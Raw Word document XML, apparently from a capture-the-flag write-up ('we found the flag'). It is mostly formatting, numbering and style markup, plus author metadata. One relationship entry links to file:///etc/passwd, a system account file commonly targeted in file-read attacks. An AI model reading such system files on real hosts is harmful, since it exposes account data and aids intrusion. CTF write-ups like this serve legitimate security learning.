    <w:p w14:paraId="12366235" w14:textId="4518F12B" w:rsidR="008C0857" w:rsidRPr="008C0857" w:rsidRDefault="008C0857" w:rsidP="00F60D74">
      <w:pPr>
        <w:ind w:left="45"/>
      </w:pPr>
      <w:r>
        <w:t>This is it, we found the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EDDF33" w14:textId="77777777" w:rsidR="004F0203" w:rsidRPr="00303479" w:rsidRDefault="004F0203" w:rsidP="001A4EE7"/>
    <w:sectPr w:rsidR="004F0203" w:rsidRPr="003034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46997"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D704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350DE2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A5346862"/>
    <w:lvl w:ilvl="0" w:tplc="189EBFEA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="405" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>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7E0C6374"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B800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5365930">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2005670217">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1632976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2BC"/>
    <w:rsid w:val="00016208"/>
    <w:rsid w:val="000216DB"/>
    <w:rsid w:val="00080E3F"/>
    <w:rsid w:val="000F0126"/>
    <w:rsid w:val="00160EE9"/>
    <w:rsid w:val="001A4EE7"/>
    <w:rsid w:val="001F3C2A"/>
    <w:rsid w:val="0025739D"/>
    <w:rsid w:val="002C31A8"/>
    <w:rsid w:val="002C6AC1"/>
    <w:rsid w:val="002C7892"/>
    <w:rsid w:val="00303479"/>
    <w:rsid w:val="003249E9"/>
    <w:rsid w:val="0046472A"/>
    <w:rsid w:val="00471BA2"/>
    <w:rsid w:val="004F0203"/>
    <w:rsid w:val="006E2874"/>
    <w:rsid w:val="00705768"/>
    <w:rsid w:val="007460F8"/>
    <w:rsid w:val="00824C29"/>
    <w:rsid w:val="00845159"/>
    <w:rsid w:val="008C0857"/>
    <w:rsid w:val="00922440"/>
    <w:rsid w:val="00932B78"/>
    <w:rsid w:val="00986175"/>
    <w:rsid w:val="00A16612"/>
    <w:rsid w:val="00A44356"/>
    <w:rsid w:val="00A85B48"/>
    <w:rsid w:val="00A97813"/>
    <w:rsid w:val="00AB4F57"/>
    <w:rsid w:val="00AF14A8"/>
    <w:rsid w:val="00B26FF6"/>
    <w:rsid w:val="00BD677E"/>
    <w:rsid w:val="00BE163A"/>
    <w:rsid w:val="00C155E6"/>
    <w:rsid w:val="00C602BC"/>
    <w:rsid w:val="00C63CA4"/>
    <w:rsid w:val="00D51EED"/>
    <w:rsid w:val="00D848F3"/>
    <w:rsid w:val="00DF09BA"/>
    <w:rsid w:val="00EC304B"/>
    <w:rsid w:val="00F32E97"/>
    <w:rsid w:val="00F4459F"/>
    <w:rsid w:val="00F60D74"/>
    <w:rsid w:val="00F62999"/>
    <w:rsid w:val="00F71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5FB5E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F43D6776-DAD2-4064-B6C0-B9609595C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2BC"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00471BA2"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00471B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hyperlink" Target="file:///etc/passwd" TargetMode="External"/><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26</Pages>
  <Words>1592</Words>
  <Characters>9076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Vadachkoria</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mariam Vadachkoria</cp:lastModifiedBy>
  <cp:revision>33</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-23T12:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-09T09:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>